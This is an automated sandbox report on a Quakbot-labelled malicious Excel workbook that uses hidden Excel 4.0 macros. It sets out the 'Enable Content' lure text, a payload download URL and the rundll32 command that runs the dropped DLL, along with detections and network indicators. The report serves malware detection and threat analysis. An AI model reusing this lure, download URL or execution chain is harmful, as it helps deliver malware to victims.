Loading ...

Play interactive tourEdit tour

Analysis Report document-1019153116.xls

Overview

General Information

Sample Name:document-1019153116.xls
Analysis ID:355906
MD5:948a7b1bc28afb293a7f3fe933e11b83
SHA1:8f858737a636e731b1b1220fd80d3234052fdf98
SHA256:4e657cfccf1d18b8166a8adb446bf8cf82e4ad20c178689c3cb872ca1b059092
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2028 cmdline: rundll32 ..\iopjvdf.vock,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1019153116.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11c58:$e1: Enable Editing
  • 0x11ccd:$e2: Enable Content
document-1019153116.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x13ea2:$s1: Excel
  • 0x14efd:$s1: Excel
  • 0x36b7:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1019153116.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\iopjvdf.vock,DllRegisterServer, CommandLine: rundll32 ..\iopjvdf.vock,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2268, ProcessCommandLine: rundll32 ..\iopjvdf.vock,DllRegisterServer, ProcessId: 2028

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1019153116.xlsReversingLabs: Detection: 21%

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: marknadsundersokning.nu
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 195.74.38.127:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 195.74.38.127:443
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: marknadsundersokning.nu
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: document-1019153116.xlsString found in binary or memory: https://marknadsundersokning.nu/ds/1902.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1019153116.xlsInitial sample: EXEC
    Source: document-1019153116.xlsOLE indicator, VBA macros: true
    Source: document-1019153116.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-1019153116.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\50EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7E7.tmpJump to behavior
    Source: document-1019153116.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iopjvdf.vock,DllRegisterServer
    Source: document-1019153116.xlsReversingLabs: Detection: 21%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iopjvdf.vock,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iopjvdf.vock,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1019153116.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1019153116.xls21%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    marknadsundersokning.nu0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://marknadsundersokning.nu/ds/1902.gif0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    marknadsundersokning.nu
    195.74.38.127
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2099351808.0000000001E27000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpfalse
              high
              https://marknadsundersokning.nu/ds/1902.gifdocument-1019153116.xlsfalse
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2099153587.0000000001C40000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                195.74.38.127
                unknownSweden
                35041NET-BINERO-STHLM1SEfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:355906
                Start date:22.02.2021
                Start time:09:07:46
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 4m 42s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:document-1019153116.xls
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.evad.winXLS@3/5@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                195.74.38.127document-1109482545.xlsGet hashmaliciousBrowse
                  document-1109482545.xlsGet hashmaliciousBrowse
                    https://danborjesson.com//main.php/#jeanserge_hien@iamgold.comGet hashmaliciousBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      marknadsundersokning.nudocument-1109482545.xlsGet hashmaliciousBrowse
                      • 195.74.38.127
                      document-1109482545.xlsGet hashmaliciousBrowse
                      • 195.74.38.127

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      NET-BINERO-STHLM1SEdocument-1109482545.xlsGet hashmaliciousBrowse
                      • 195.74.38.127
                      document-1109482545.xlsGet hashmaliciousBrowse
                      • 195.74.38.127
                      7BkDeaSmzd.docGet hashmaliciousBrowse
                      • 195.74.38.63
                      ins.exeGet hashmaliciousBrowse
                      • 195.74.38.62
                      inv.exeGet hashmaliciousBrowse
                      • 195.74.38.62
                      New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                      • 195.74.38.62
                      New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                      • 195.74.38.62
                      nko-Fichero-ES.msiGet hashmaliciousBrowse
                      • 195.74.38.93
                      dy-Fichero-ES.msiGet hashmaliciousBrowse
                      • 195.74.38.93
                      oym-FicheroES.msiGet hashmaliciousBrowse
                      • 195.74.38.93
                      http://ctannous.com/qoep9/public/g2tfqpi78/Get hashmaliciousBrowse
                      • 195.74.38.63
                      https://handesign.vn/qcu/statement/Get hashmaliciousBrowse
                      • 195.74.38.63

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\7FDE0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):64361
                      Entropy (8bit):7.684495659223058
                      Encrypted:false
                      SSDEEP:1536:cn0WhVYfJctSVxFbp9OfifeAftApi2S2IP1YS:cn0WhqESVxFvOfifFfWplVIP1n
                      MD5:0C9FEA6962FEF69F82CBF6D43D385D72
                      SHA1:F5C8EB4A6428250723B78ABE0AD4E485D5CB9A3F
                      SHA-256:F9517887432082174F7A7829347015A17D8BB71C7478DC1A582ABC6A41DE0B0A
                      SHA-512:03DD6D5E1E99CA7D4C001626340E70BAB78DFC97ADF1BF15C40110775C635E161783FC72D490811F06CA2D770437B80C9B5FDCCB2CC394E9AD03781198B5DCDD
                      Malicious:false
                      Reputation:low
                      Preview: .U.n.0....?..........C....I?.&..an.0.........#.z."..G.5.#D.......J..e.....X.I8%.w.- .Z|.4.......[...s...+......|.".... .Zt./g..\z...:e......x0......:V]...R-.6..u~...n.!B0Z.D...S{.j.Zi....Kf...... Y...c.....|C3...D...B.c.._..7.....^..p.i..VP..~.Km..O>.....$...5l$...o....8.4@kB.g.G...y..x.....n.$.x.G.=...3.63...,.r..!......../..o..L..5.gN.#.R.E.u..xvg7.{...)[....>.M.Ja.uO'.....iV.F...x...<.....AL...wh...4.N..._/...m^^g.........PK..........!..%b.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Feb 22 16:08:42 2021, atime=Mon Feb 22 16:08:42 2021, length=8192, window=hide
                      Category:dropped
                      Size (bytes):867
                      Entropy (8bit):4.488795912986052
                      Encrypted:false
                      SSDEEP:12:85QXXEcLgXg/XAlCPCHaX2B8GB/wUOxX+Wnicvb0nbDtZ3YilMMEpxRljKRlCTdK:858XV/XTm6GGJYeIbDv3qsArNru/
                      MD5:B416ED716D7E12B6B0552A760914215B
                      SHA1:A18D44980D4B643E9C63A9DAB00ECC701AC67DA3
                      SHA-256:7C66EE00CC6C3D064644589E387F927968475FF2C65AA842B53F085BF52AAB50
                      SHA-512:37115F9FA4D98642419E87B31051894E2337439735B13208F5189A525EDAE0C478A99B32C6FE085097C56623C13F790539784A6E5B1342275A2E59365B6398DF
                      Malicious:false
                      Reputation:low
                      Preview: L..................F...........7G..vxE_=...vxE_=.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....VR....Desktop.d......QK.XVR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841675..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1019153116.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Mon Feb 22 16:08:42 2021, atime=Mon Feb 22 16:08:42 2021, length=91136, window=hide
                      Category:dropped
                      Size (bytes):2118
                      Entropy (8bit):4.503765643439255
                      Encrypted:false
                      SSDEEP:48:8zr/XTFGq3Bh5BEsAQh2zr/XTFGq3Bh5BEsAQ/:8zr/XJGqxNEvQh2zr/XJGqxNEvQ/
                      MD5:E0AA4165386E623CEB069A0D7BA6499C
                      SHA1:0C3B1760457822F8276FFE703E03AD0A8B0F7815
                      SHA-256:39E0BC22279877DF21EDCC70BC5B676510717D5BE71D8A55290465892DE331BD
                      SHA-512:53643399F3E62D44AB2B1E3359CC968253BE87CB7EF7F5BE518206B4325963A846A91C7A6CDE219E9C442219F3DAB732B47BC15D92BD7C2C725CE3AF65C5ABF3
                      Malicious:false
                      Reputation:low
                      Preview: L..................F.... ....g+..{..vxE_=...X_Q_=....d...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..d..VR.. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.0.1.9.1.5.3.1.1.6...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop\document-1019153116.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.0.1.9.1.5.3.1.1.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841675..........D_....3N.
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):110
                      Entropy (8bit):4.657921932424814
                      Encrypted:false
                      SSDEEP:3:oyBVomMY9LRqpFoZELRqpFomMY9LRqpFov:dj6Y9LQpFSELQpF6Y9LQpFy
                      MD5:AD54D28BC72BB3AE0B8D6F3A02779930
                      SHA1:1B7BCAA8E0AA9C6816C87632204CECDBD5606B6B
                      SHA-256:FB0FF89328C6F3B88606C388F987C095307B800A0FF7B19ECDE6A4E315F5620B
                      SHA-512:184158C298210DA588B8FAEF8ABB3BAB6937A7AB48902453373A2A02990B0F02E1BB1B556253151042ACB7D8A58E96813441BE65BF38D96664A69892F626D9A7
                      Malicious:false
                      Reputation:low
                      Preview: Desktop.LNK=0..[xls]..document-1019153116.LNK=0..document-1019153116.LNK=0..[xls]..document-1019153116.LNK=0..
                      C:\Users\user\Desktop\50EE0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Applesoft BASIC program data, first line number 16
                      Category:dropped
                      Size (bytes):124228
                      Entropy (8bit):4.293071155115131
                      Encrypted:false
                      SSDEEP:3072:uKcKoSsxzNDZLDZjlbR868O8KL5L+FxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVO:pcKoSsxzNDZLDZjlbR868O8KL5L+FxEh
                      MD5:AB6EE87A875CC6F92D281823CD4DFB93
                      SHA1:563F9324E226B66488AFEA36343037C0E2C8041B
                      SHA-256:191D1662946EA2EBE54A2BAEB8570C010419278BEBE617C4F13E6146A269C094
                      SHA-512:61A4AD6D235E1BC933D1528B52DEA9913B2E7F72623FB4ABE443ECAD5E5618DCCBA1655BA08DF8EF99BD8BFE30DD0259AEF0CB7C68258C96D388E5C48955BE24
                      Malicious:false
                      Reputation:low
                      Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 09:21:15 2021, Security: 0
                      Entropy (8bit):3.440161290247343
                      TrID:
                      • Microsoft Excel sheet (30009/1) 78.94%
                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                      File name:document-1019153116.xls
                      File size:91136
                      MD5:948a7b1bc28afb293a7f3fe933e11b83
                      SHA1:8f858737a636e731b1b1220fd80d3234052fdf98
                      SHA256:4e657cfccf1d18b8166a8adb446bf8cf82e4ad20c178689c3cb872ca1b059092
                      SHA512:cee16e7286ac47086a5432b7866d6295e2baa7f081784cb8149379d327d884eaf7b434bc8d2dd6c4d0eaaf4178eb7fcb88ed9f5a49300f00fedc8989898df622
